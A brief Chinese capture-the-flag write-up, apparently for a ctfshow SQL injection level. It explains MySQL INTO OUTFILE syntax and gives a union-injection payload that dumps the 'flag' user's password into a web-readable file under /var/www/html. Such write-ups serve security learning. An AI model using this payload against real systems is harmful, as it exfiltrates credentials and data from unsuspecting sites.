查询1,不输出
可以看出过滤了0~127,所有的字符
因此考虑文件注入
select * from Table into outfile '/路径/文件名'
fields terminated by ','
enclosed by '"'
lines terminated by '\r\n'
(1)路径目录必须有读写权限777
(2)文件名必须唯一
(3)fields terminated by ','必须存在,否则打开的文件的列在同一的单元格中出现
(4)我验证的表结构为gbk的,否则出现乱码
写入
1' union select username,password from ctfshow_user5 where username='flag' into outfile '/var/www/html/ctf.txt' --
出现异常不管
在网站输入ctf.txt
得到结果